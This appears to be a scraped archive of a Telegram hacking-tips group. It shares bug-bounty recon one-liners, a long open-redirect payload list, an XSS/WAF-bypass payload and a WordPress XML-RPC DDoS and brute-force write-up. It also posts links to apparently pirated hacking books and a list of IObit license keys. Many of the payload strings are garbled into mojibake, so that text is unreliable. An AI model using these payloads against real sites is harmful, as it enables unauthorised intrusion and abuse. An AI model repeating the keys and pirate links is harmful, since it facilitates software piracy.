Termux All Command [Telegram Group]
Open in Telegram
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
Show more1 185
Subscribers
+124 hours
+157 days
+4830 days
Posts Archive
JS Recon : WaybackURLs & HTTPX
waybackurls url | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} python lazyegg[.]py "{}" --js_urls --domains --ips > urls && cat urls | grep '\.' | sort -u | xargs -I{} httpx -silent -u {} -sc -title -td
Do not forget to React β€οΈ to this Message for More Content Like this .
[ππ πππππ ππ
πππππππ πππ πππππππππππ πππππππ : πππππππππ ππ πππππππ ]
βοΈ All links posted here are just shared from other available media and all of them are benign βοΈ
1. Gray Hat Hacking The Ethical Hackerβs Handbook.
βοΈhttps://lnkd.in/dXYJriEG
2. Gray Hat Hacking: The Ethical Hackerβs Handbook, Fifth Edition
βοΈhttps://lnkd.in/dx-z3eqn
3. Gray Hat Hacking: The Ethical Hackerβs Handbook, Fourth Edition
βοΈhttps://lnkd.in/duwdhUwq
4. Gray Hat Hacking: The Ethical Hackerβs Handbook, Second Edition.
βοΈhttps://lnkd.in/dmYhinjD
5. Penetration Testing: A Survival Guide.
βοΈhttps://lnkd.in/d2v3ykw6
6. Mastering Modern Web Penetration Testing.
βοΈhttps://lnkd.in/d7skwMTF
7. THE HACKER PLAYBOOK 2 Practical Guide To Penetration Testing.
βοΈhttps://lnkd.in/ddagnRyG
8. The Basics of hacking and penetration testing.
βοΈhttps://lnkd.in/deAFkz_w
9. Quick Start Guide to Penetration Testing.
βοΈhttps://lnkd.in/dVrXMSZ5
10. ETHICAL HACKING AND PENETRATION TESTING GUIDE.
βοΈhttps://lnkd.in/d8swSeft
11. . ETHICAL HACKING 101 How to conduct professional pentestings in 21 days or less!
βοΈhttps://lnkd.in/dMJAx-Jc
12. HackLOG Security & Ethical Hacking Handbook VOLUME 1 ANONYMITY
βοΈhttps://lnkd.in/dkKnizGa
.
.
.
π¨π¨ πππππ - Do you know other resources? Please share them in the commentπ¨π¨
You should read these new articles.
1- Story of Http password reset link for $500
https://lnkd.in/dbGwbMWt
2- A Story of Zero-click Complete Account Takeover Via Response Manipulation
https://lnkd.in/d26DQ5cN
3- Penetration Testing with Termux: A Newbieβs Success Story
https://lnkd.in/dRmBUDrX
4- Inside JSON Web Tokens (JWT): Security Insights and Exploits
https://lnkd.in/dt2ikHvh
5- Mastering Subdomain Takeovers
https://lnkd.in/dUB7zXqm
6- How to Detect if Your Mobile Phone Has Been Hacked: Signs and Steps to Take
https://lnkd.in/dMHhFUbS
IObit Uninstaller Keys> Status: Active β > Version: Pro 13.x > Download: Click Here >
30C81-393A2-7DBAF-390TC
> Expires On: 8 Nov, 2024
> 6E25C-21F89-7F62B-D86BC
> Expires On: 16 Oct, 2024
> F6741-F743C-7CE93-3C8TC
> Expires On: 20 June, 2024
> DB978-6E333-B12DC-7BDTC
> Expires On: 14 June, 2024
> 11242-C437D-DE013-6E6TC
> Expires On: 30 May, 2024π All the links posted here are benign π
1. The Tangled Web. A Guide to Securing Modern Web Applications
π€ https://lnkd.in/dfXn2u3f
2. Web App Hacking (Hackers Handbook
π€ https://lnkd.in/dtMx8hZD
3. Pentesting Azure Applications.
π€ https://lnkd.in/dxbWzRjY
4. Gray Hat C# a Hackerβs Guide to Creating and automating Security tools by Brandon Perry
π€ https://lnkd.in/dpGxAuZx
5. Linux Command Line and Shell Scripting Bible (Massive Guide 1052 pags)
π€ https://lnkd.in/dRBfKR6x
6. Nmap Official Guide+ Scripts.
π€ https://lnkd.in/dyHfjvEB
7. Antivirus Hackers handbook.
π€ https://lnkd.in/dBb2bv6W
8. Network Security Bible.
π€ https://lnkd.in/dyUvi7xx
9. Hacking Bible
π€ https://lnkd.in/d8FJxvEr
Open redirect payloads #
Payloads to detect open redirection
<>//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
//;@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/////βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
/////βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
////βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦//
////βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
///\;@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦//
///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
//\/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦//
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/.βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/\/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
/γ±βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
.βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
\/\/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
γ±βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
//βπ¨π°οΏ½πβ
πΈβββΉβ%00qPβ¦
%01https://βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
%01https://google.com
////%09/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
///%09/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
//%09/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/%09/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
////%09/google.com
///%09/google.com
//%09/google.com
/%09/google.com
/%09/javascriptβ:alert(1);
/%09/javascriptβ:alert(1)
////%09/whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
///%09/whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
//%09/whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/%09/whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
////%09/whitelisted.com@google.com
///%09/whitelisted.com@google.com
//%09/whitelisted.com@google.com
/%09/whitelisted.com@google.com
&%0d%0a1Location:https://google.com
\152\141\166\141\163\143\162\151\160\164\072alert(1)
%19Jav%09asc%09ript:https%20://https://lnkd.in/g23S7aus
////216.58.214.206
///216.58.214.206
//216.58.214.206
/\216.58.214.206
/216.58.214.206
216.58.214.206
////βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e
///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e
////βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e%2f
///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e%2f
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2e%2e%2f
////βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f..
///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f..
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f..
%2f216.58.214.206//
%2f216.58.214.206
%2f216.58.214.206%2f%2f
////βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
///βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
//βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
/βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/%2f%2e%2e
//%2f%2fβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/%2f%2fβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
%2f$2f216.58.214.206
$2f%2f216.58.214.206%2f%2f
%2f$2f3627734734
$2f%2f3627734734%2f%2f
//%2f%2fgoogle.com
/%2f%2fgoogle.com
$2f%2fgoogle.com
%2f$2fgoogle.com
$2f%2fgoogle.com%2f%2f
%2f3627734734//
%2f3627734734
%2f3627734734%2f%2f
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
%2fgoogle.com//
%2fgoogle.com
%2fgoogle.com%2f%2f
////3627734734
///3627734734
//3627734734
/\3627734734
/3627734734
3627734734
//3H6k7lIAiqjfNeN@whitelisted.com@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
//3H6k7lIAiqjfNeN@whitelisted.com+@βπ¨π°οΏ½πβ
πΈβββΉβqPβ¦/
//3H6k7lIAiqjfNeN@whitelisted.com@google.com/
//3H6k7lIAiqjfNeN@whitelisted.com+@google.com/
////%5cβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
///%5cβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
//%5cβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
/%5cβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
////%5cgoogle.com
///%5cgoogle.com
//%5cgoogle.com
/%5cgoogle.com
//%5cjavascriptβ:alert(1);
//%5cjavascriptβ:alert(1)
/%5cjavascriptβ:alert(1);
///%5cβπ¨π°οΏ½πβ
πΈβββΉβqPβ¦
Hiii hug hunters
Today I Found IDOR
I found JS file /static/js/main.a32c4.js
Ctrl+F I search for /admin i found path adminuser
Tips:
Use this commands to extract js endpoints
waybackurls βexample.comβ | grep -Eo βhttps?://[^/]+/[^β]+\.jsβ | sed βs|^https\?://[^/]\+/β | awk -F β/β β{print $NF}β > JSEndpoints
waybackurls "example.com": This command retrieves URLs associated with "example.com" from the Wayback Machine archives.
grep -Eo 'https?://[^/]+/[^"]+\.js': This command searches for URLs with a .js extension. The -E flag enables extended regular expressions, and the -o flag tells grep to output only the matching parts.
sed 's|^https\?://[^/]\+/': This command removes the protocol (http:// or https://) and domain name from each URL, leaving only the path.
awk -F '/' '{print $NF}': This command extracts the last part of each URL after splitting it by /, effectively removing the domain part.
Try to use the JSEndponits with dirsearch useful for directory listing
Dirsearch -u https://example.com -w JSEndponits
Bug Bounty Tips
1. waybackurls target.com | grep = | urless | anew | tee param.txt
2. cat param.txt | nuclei -t fuzzing-templates -dast
" TEETO "
A simple and completely free extension to quickly analyse a web page.
Finds endpoints (URLs), secrets (API-keys etc) and URL parameters. : https://chromewebstore.google.com/detail/teeto/jkonpljnfkapenfcfdhmilkbmnbalnml
SQL injection to XSS bypass + CloudFlare bypass
Payload: '<00 foo="XSS-CLick--%20/
Tips :- π¨X-Recon: A utility for detecting webpage inputs and conducting XSS scans.π¨
Features:
1. Subdomain Discovery
2. Site-wide Link Discovery
3. Form and Input Extraction
4. XSS Scanning
πLink: https://lnkd.in/gfAeBPz7
Exploiting Wordpress XML-RPC file
The XMLRPC is a system that allows remote updates to WordPress from other applications. For instance, the Windows Live Writer system is capable of posting blogs directly to WordPress because of xmlrpc.php. In essence, xmlrpc.php could open the site to various attacks and other issues.
The XML-RPC API that WordPress provides gives developers a way to write applications (for you) that can do many of the things that you can do when logged into WordPress via the web interface.
These include:
Publish a post
Edit a post
Delete a post.
Upload a new file (e.g. an image for a post)
Get a list of comments
Edit comments
DDOS ATTACK
Now, considering that file discussed above could potentially be abused to cause a DDOS attack against a victim host. This is achieved by simply sending a request that looks like below.
BRUTEFORCE ATTACK
To perform a bruteforce login attack, send the following in the POST request, if you know any valid usernames that would be even better (wp-scan would help).
Though you should always get a 200 OK response, you should be able to tell if the login you entered on the intruder is correct.
Remediation:
If the XMLRPC.php file is not being used, it should be disabled and removed completely to avoid any potential risks. Otherwise, it should at the very least be blocked from external access.
Available now! Telegram Research 2025 β the year's key insights 
